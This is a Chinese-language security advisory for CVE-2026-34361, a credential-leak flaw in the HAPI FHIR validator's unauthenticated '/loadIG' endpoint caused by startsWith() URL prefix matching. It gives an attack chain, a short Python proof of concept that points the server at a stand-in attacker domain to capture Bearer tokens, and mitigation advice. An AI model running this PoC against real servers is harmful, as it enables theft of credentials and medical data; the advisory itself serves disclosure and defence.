CVE-2026-34361 CVSS 9.3 严重

CVE-2026-34361 HAPI FHIR 认证令牌窃取漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34361

漏洞类型

SSRF, 认证绕过

CVSS评分

9.3 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

HAPI FHIR

漏洞概述

HAPI FHIR 6.9.4之前版本存在严重安全漏洞。FHIR Validator HTTP服务未认证的"/loadIG"端点允许向外部发起请求。攻击者结合凭证提供者中的URL前缀匹配缺陷，可通过注册与合法服务器URL前缀匹配的恶意域名，诱导系统将认证令牌（如Bearer Token、Basic Auth）发送至受控服务器，从而导致敏感凭据窃取。

技术细节

该漏洞的核心在于HAPI FHIR的FHIR Validator HTTP服务中存在一个未认证的端点"/loadIG"，该端点被设计用于加载实施指南，但允许发起出站HTTP请求。漏洞触发点在于`ManagedWebAccessUtils.getServer()`方法中的凭证匹配逻辑使用了不安全的`startsWith()`函数进行URL前缀匹配。攻击者首先需要探测或知晓目标系统配置的合法FHIR服务器URL（例如：https://api.example.com）。随后，攻击者注册一个在字符串前缀上匹配该合法URL的域名（例如：https://api.example.com.attacker-domain.com）。当受害者系统通过"/loadIG"端点加载攻击者提供的资源时，系统会错误地认为请求发往合法的"api.example.com"，从而将存储的Bearer Token或API Key附加在请求头中发送给攻击者的服务器。由于无需认证即可利用，攻击者可轻易窃取高权限凭证，进而接管FHIR服务或访问敏感医疗数据。

攻击链分析

STEP 1

侦察

攻击者探测目标HAPI FHIR服务，并尝试获取其配置的合法FHIR服务器URL（如 https://api.example.com）。

STEP 2

准备

攻击者注册一个包含合法URL作为前缀的恶意域名（如 api.example.com.attacker.com），并搭建接收HTTP请求的服务器。

STEP 3

利用

攻击者向未认证的"/loadIG"端点发送请求，参数中包含恶意域名URL。

STEP 4

凭证窃取

由于`startsWith()`匹配缺陷，服务器将恶意域名误判为合法地址，把Bearer Token等凭证附加在请求头发送给攻击者。

STEP 5

后渗透

攻击者使用截获的凭证访问合法FHIR服务器，窃取或篡改医疗数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC Concept: Demonstrate the SSRF and Credential Leakage
# Assumption: Attacker controls 'api.example.com.attacker.com'
# Target: HAPI FHIR Validator Service

target_url = "http://vulnerable-hapi-server:8080/loadIG"
# Malicious URL that prefixes the legitimate "api.example.com"
malicious_ig_url = "https://api.example.com.attacker.com/malicious-package.tgz"

try:
    print(f"[+] Sending request to {target_url}")
    print(f"[+] Using malicious IG URL: {malicious_ig_url}")

    # The server will make an outbound request to 'malicious_ig_url'
    # It will attach credentials meant for 'api.example.com' due to the startsWith() flaw
    response = requests.get(target_url, params={"url": malicious_ig_url})

    if response.status_code == 200:
        print("[+] Request sent successfully. Check attacker server logs for stolen headers.")
    else:
        print(f"[-] Request failed with status: {response.status_code}")

except Exception as e:
    print(f"[-] Error: {e}")

影响范围

HAPI FHIR < 6.9.4

防御指南

临时缓解措施

如果无法立即升级，建议通过网络访问控制列表（ACL）或防火墙规则完全阻断对"/loadIG"接口的外部访问，并严格审计服务器的出站网络连接日志，以检测是否存在向未知域名的异常凭证传输行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表